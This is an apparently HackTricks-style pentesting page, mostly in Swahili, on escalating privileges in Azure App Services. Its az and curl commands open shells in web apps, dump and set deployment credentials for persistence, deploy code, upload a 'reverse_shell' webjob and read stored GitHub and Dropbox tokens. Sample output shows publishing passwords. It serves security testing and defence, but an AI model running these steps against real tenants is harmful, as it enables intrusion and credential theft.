Az - App Services Privesc

Reading time: 10 minutes

App Services

Kwa maelezo zaidi kuhusu Azure App services angalia:

Az - Azure App Services

Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read

Ruhusa hizi zinaruhusu kupata SSH shell ndani ya programu ya wavuti. Pia zinaruhusu debug programu hiyo.

• SSH katika amri moja:

# Direct option
az webapp ssh --name <name> --resource-group <res-group>

• Unda tunnel kisha unganisha na SSH:

az webapp create-remote-connection --name <name> --resource-group <res-group>

## If successful you will get a message such as:
#Verifying if app is running....
#App is running. Trying to establish tunnel connection...
#Opening tunnel on port: 39895
#SSH is available { username: root, password: Docker! }

## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
ssh root@127.0.0.1 -p 39895

• Debug the application:

1. Install the Azure extension in VScode.
2. Login in the extension with the Azure account.
3. List all the App services inside the subscription.
4. Select the App service you want to debug, right click and select "Start Debugging".
5. If the app doesn't have debugging enabled, the extension will try to enable it but your account needs the permission Microsoft.Web/sites/config/write to do so.

Obtaining SCM Credentials & Enabling Basic Authentication

Ili kupata akreditivu za SCM, unaweza kutumia commands and permissions zifuatazo:

• The permission Microsoft.Web/sites/publishxml/action allows to call:

az webapp deployment list-publishing-profiles --name <app-name> --resource-group <res-group>
# Example output
[
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy",
"publishMethod": "MSDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"ftpPassiveMode": "True",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP",
"publishMethod": "FTP",
"publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot",
"userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy",
"publishMethod": "ZipDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
}
]

Kumbuka jinsi jina la mtumiaji daima ni sawa (isipokuwa katika FTP ambayo inaongeza jina la programu mwanzoni) lakini nenosiri ni sawa kwa wote.

Zaidi ya hayo, URL ya SCM ni <app-name>.scm.azurewebsites.net.

• Ruhusa Microsoft.Web/sites/config/list/action inaruhusu kuita:

az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
# Example output
{
"id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"kind": null,
"location": "Canada Central",
"name": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"publishingPasswordHash": null,
"publishingPasswordHashSalt": null,
"publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"resourceGroup": "carlos_rg_3170",
"scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net",
"type": "Microsoft.Web/sites/publishingcredentials"
}

Kumbuka jinsi akili ni sawa na katika amri ya awali.

• Chaguo lingine lingekuwa kweka akili zako mwenyewe na kuzitumia:

# Show if any user is configured (password won't be shown)
az webapp deployment user show

# Set your own credentials
az webapp deployment user set \
--user-name hacktricks \
--password 'W34kP@ssw0rd123!'

# To delete it, check https://stackoverflow.com/questions/45275329/remove-deployment-credentials-from-azure-webapp

Kisha, unaweza kutumia hizi credentials kuingia kwenye jukwaa la SCM na FTP. Hii pia ni njia nzuri ya kudumisha uvumilivu.

Kumbuka kwamba ili kuingia kwenye jukwaa la SCM kutoka mtandao unahitaji kuingia kwenye <SCM-URL>/BasicAuth.

• Ikiwa unaona kwamba hizo credentials zime REDACTED, ni kwa sababu unahitaji kuwezesha chaguo la uthibitishaji wa msingi wa SCM na kwa hiyo unahitaji ruhusa ya pili (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

Publish code using SCM credentials

Kuwa na akreditif za SCM halali inawezekana kuchapisha msimbo kwenye huduma ya App. Hii inaweza kufanywa kwa kutumia amri ifuatayo.

Kwa mfano huu wa python unaweza kupakua repo kutoka https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, fanya mabadiliko yoyote unayotaka na kisha zip kwa kukimbia: zip -r app.zip ..

Kisha unaweza kuchapisha msimbo katika programu ya wavuti kwa kutumia amri ifuatayo:

curl -X POST "<SMC-URL>/api/publish?type=zip" --data-binary "@./app.zip" -u '<username>:<password>' -H "Content-Type: application/octet-stream"

Webjobs: Microsoft.Web/sites/publish/Action | SCM credentials

Ruhusa iliyoelezwa ya Azure inaruhusu kufanya vitendo kadhaa vya kuvutia ambavyo vinaweza pia kufanywa kwa kutumia SCM credentials:

• Soma Webjobs logs:

# Using Azure credentials
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt"  --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt"  --resource "https://management.azure.com/"

# Using SCM username and password:
curl "<SCM-URL>/vfs/data/jobs/continuous/job_name/job_log.txt" \
--user '<username>:<password>' -v

• Soma Webjobs msimbo wa chanzo:

# Using SCM username and password:
# Find all the webjobs inside:
curl "<SCM-URL>/wwwroot/App_Data/jobs/" \
--user '<username>:<password>'

# e.g.
curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \
--user '<username>:<password>'

• Unda Webjob endelevu:

# Using Azure permissions
az rest \
--method put \
--uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
--headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
--body "@/Users/username/Downloads/rev.js" \
--resource "https://management.azure.com/"

# Using SCM credentials
curl -X PUT \
"<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
-H 'Content-Disposition: attachment; filename=rev.js' \
--data-binary "@/Users/carlospolop/Downloads/rev.js" \
--user '<username>:<password>'

Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

Hizi ruhusa zinaruhusu kuteua utambulisho wa kusimamiwa kwa huduma ya App, hivyo ikiwa huduma ya App ilishambuliwa hapo awali hii itaruhusu mshambuliaji kuteua utambulisho mpya wa kusimamiwa kwa huduma ya App na kuinua mamlaka kwao.

az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>

Microsoft.Web/sites/config/list/action

Ruhusa hii inaruhusu kuorodhesha connection strings na appsettings za huduma ya App ambazo zinaweza kuwa na taarifa nyeti kama vile akidi za database.

az webapp config connection-string list --name <name> --resource-group <res-group>
az webapp config appsettings list --name <name> --resource-group <res-group>

Soma Akikodi za Watu wa Tatu Zilizowekwa

Kukimbia amri ifuatayo inawezekana kusoma akidi za watu wa tatu zilizowekwa katika akaunti ya sasa. Kumbuka kwamba ikiwa kwa mfano akidi za Github zimewekwa kwa mtumiaji tofauti, huwezi kupata token kutoka kwa mwingine.

az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"

Amri hii inarudisha tokeni za Github, Bitbucket, Dropbox na OneDrive.

Hapa kuna mifano ya amri za kuangalia tokeni:

# GitHub – List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos

# Bitbucket – List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories

# Dropbox – List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'

# OneDrive – List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children

Update App Code from the source

• Ikiwa chanzo kilichowekwa ni mtoa huduma wa tatu kama Github, BitBucket au Azure Repository, unaweza kusaidia kuboresha msimbo wa huduma ya App kwa kuathiri msimbo wa chanzo katika hifadhi.
• Ikiwa programu imewekwa kutumia hifadhi ya git ya mbali (ikiwa na jina la mtumiaji na nenosiri), inawezekana kupata URL na akreditif za msingi za uthibitishaji ili kunakili na kusukuma mabadiliko kwa:
• Kutumia ruhusa Microsoft.Web/sites/sourcecontrols/read: az webapp deployment source show --name <app-name> --resource-group <res-group>
• Kutumia ruhusa Microsoft.Web/sites/config/list/action:
• az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
• az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"
• Ikiwa programu imewekwa kutumia hifadhi ya git ya ndani, inawezekana kunakili hifadhi na kusukuma mabadiliko ndani yake:
• Kutumia ruhusa Microsoft.Web/sites/sourcecontrols/read: Unaweza kupata URL ya hifadhi ya git kwa az webapp deployment source show --name <app-name> --resource-group <res-group>, lakini itakuwa sawa na URL ya SCM ya programu yenye njia /<app-name>.git (mfano https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git).
• Ili kupata akreditif za SCM unahitaji ruhusa:
• Microsoft.Web/sites/publishxml/action: Kisha endesha az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>.
• Microsoft.Web/sites/config/list/action: Kisha endesha az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>

Microsoft.Web/sites/config/Write, Microsoft.Web/sites/config/Read, Microsoft.Web/sites/config/list/Action, Microsoft.Web/sites/Read

Hii ni seti ya ruhusa inayoruhusu kubadilisha kontena kinachotumiwa na webapp. Mshambuliaji anaweza kuitumia kuifanya webapp kutekeleza kontena hatari.

az webapp config container set \
--name <app-name> \
--resource-group <res-group> \
--docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest